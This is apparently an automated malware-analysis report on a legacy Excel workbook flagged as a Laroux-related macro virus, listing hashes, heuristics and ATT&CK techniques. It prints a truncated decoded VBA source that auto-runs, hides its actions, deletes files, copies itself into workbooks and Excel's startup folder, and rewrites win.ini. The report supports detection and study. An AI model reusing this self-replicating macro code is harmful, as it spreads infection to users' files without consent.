Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 b8a9039f82072535…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 23.5 KB
Created: 1999-09-08 05:49:21
Authoring application: Microsoft Excel
First seen: 2012-06-14
MD5: 808f8d5d53d417df9f0148bf33440d1b
SHA-1: df4c32b842f890e6900a4fd0683a79c24fee6e26
SHA-256: b8a9039f8207253521cd1a7a2c63d277c4ff5f9f73c2e49f169a7e9e25448f36
Risk Score: 120

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file contains VBA macros, specifically an Auto_Open macro, which is a strong indicator of malicious intent. The script attempts to detect and remove a competing macro virus ('PLDT.XLS') and then builds its own payload ('CURE.XLS'), suggesting downloader or dropper functionality. The presence of 'laroux' markers further supports its classification as a macro-based threat.

Heuristics (3)

  • Excel 5 Laroux/Larou-CV macro-virus marker cluster [critical] (OLE_XLS5_LAROUX_MACRO_VIRUS)
    Legacy Excel workbook contains a Laroux/Larou-CV macro-virus marker cluster including auto_open execution and workbook/module replication strings. This is a narrow indicator for an infected legacy Excel macro workbook.
  • VBA macros detected [medium] (OLE_VBA_MACROS; 1 related finding)
    Document contains VBA macro code
  • Auto_Open macro [high] (OLE_VBA_AUTO)
    Document contains an Auto_Open macro, which runs automatically when the workbook is opened

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 6163 bytes
SHA-256: c26288a209c60126a8fa6904feffaff96093117572519d37dfd9987f84c391ac

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "cure"
Sub auto_open()
Attribute auto_open.VB_ProcData.VB_Invoke_Func = " \n14"
      ' use Window event because LAROUX uses SheetActivate,
      ' I think if they use the same one then whomever is last
      ' takes over processing for that event.
    Application.OnWindow = "check_files"

End Sub

Sub check_files()
Attribute check_files.VB_ProcData.VB_Invoke_Func = " \n14"
    Application.DisplayAlerts = False '** don't ask user to verify deletes or saves
    Application.ScreenUpdating = False '** don't show what the virus(macro) is doing
    c$ = Application.StartupPath
    m$ = Dir(c$ & "\" & "PLDT.XLS")           '** check for LAROUX file
    If m$ = "PLDT.XLS" Then                   '** lets kill this one now
        Workbooks("PLDT.XLS").Close (False)   '** close it first
        Application.OnSheetActivate = ""        '** clear Laroux event handler ??
        Kill Application.StartupPath & "/" & "PLDT.XLS"  '** delete it
        MsgBox "Just killed Laroux virus for you!" & Chr(13) & Chr(10) & "       You're Welcome.....", 16
    End If
    '** new code to attempt to kill LAROUX
    '** replace "PLDT.XLS" with "CURE.XLS"
    m2$ = Dir(c$ & "\" & "CURE.XLS")      '** see if we already have the CURE
    If (m2$ = "CURE.XLS") Then p = 1 Else p = 0
    With ActiveWorkbook
       If (ActiveWorkbook.Modules.Count > 0) Then w = 1 Else w = 0
    End With
    whichfile = p + w * 10

Select Case whichfile
    Case 10            '** code to build CURE.XLS for killin XMLAROUX'
       n4$ = ActiveWorkbook.Name   '** get active workboook name
       Sheets("cure").Visible = True
       Sheets("cure").Select  '** select cure module
       Sheets("cure").Copy    '** make a copy of it in a new sheet
       With ActiveWorkbook
           .Title = ""
           .Subject = ""
           .Author = ""
           .Keywords = ""
           .Comments = ""
       End With
       newname$ = ActiveWorkbook.Name
       c4$ = CurDir()     '**  save current directory
       ChDir Application.StartupPath  '** move to startup directory
       ActiveWindow.Visible = False  '** save new workbook as CURE.XLS
       Workbooks(newname$).SaveAs FileName:=Application.StartupPath & "/" & "CURE.XLS", FileFormat:=xlNormal _
         , Password:="", WriteResPassword:="", ReadOnlyRecommended:= _
        False, CreateBackup:=False
       ChDir c4$          '** change back to original directory
       Workbooks(n4$).Sheets("cure").Visible = False
       Application.OnWindow = ""
       Application.OnWindow = "CURE.XLS!check_files"
       Workbooks(n4$).Save
       Workbooks("CURE.XLS").Saved = True
    Case 1   '** new file to infect (no virus, need the ability to infect to spread the cure)
       n4$ = ActiveWorkbook.Name
       p4$ = ActiveWorkbook.Path
       s$ = Workbooks(n4$).Sheets(1).Name  '** get name
       If s$ <> "cure" Then     '** already has the cure??
          pt$ = "c:\Winnt\win.ini"  ' check win.ini for generation number
          t$ = "[eruc]"
          Open pt$ For Input As #1
          b1$ = ""
          b0$ = ""
          b3$ = ""
          While (b1$ <> t$) And Not (EOF(1))
             b0$ = b0$ & b3$
             Line Input #1, b1$
             b3$ = b1$ & Chr(13) & Chr(10)
             'If (b1$ <> t$) Then b3$ = b1$ & Chr(13) & Chr(10) Else b3$ = b1$
          Wend
          If Not (EOF(1)) Then
             Line Input #1, b1$
             If Not (EOF(1)) Then   ' get the rest of the file
                b2$ = ""
                While Not (EOF(1))
                    Line Input #1, b2$
                    b0$ = b0$ & b2$ & Chr(13) & Chr(10)
                    'If (Not EOF(1)) Then b0$ = b0$ & b2$ & Chr(13) & Chr(10) Else b0$ = b0$ & b2$
                Wend
             End If
             gn = Val(b1$)
             If gn = 5 Then f = 0 Else f = 1  ' infectous or not
             Close #1
             Open pt$ For Output As #2
             gn = gn + 1
             b0$ = b0$ & t$ & Chr(13) & Chr(10) & gn
             Print #2
... (truncated)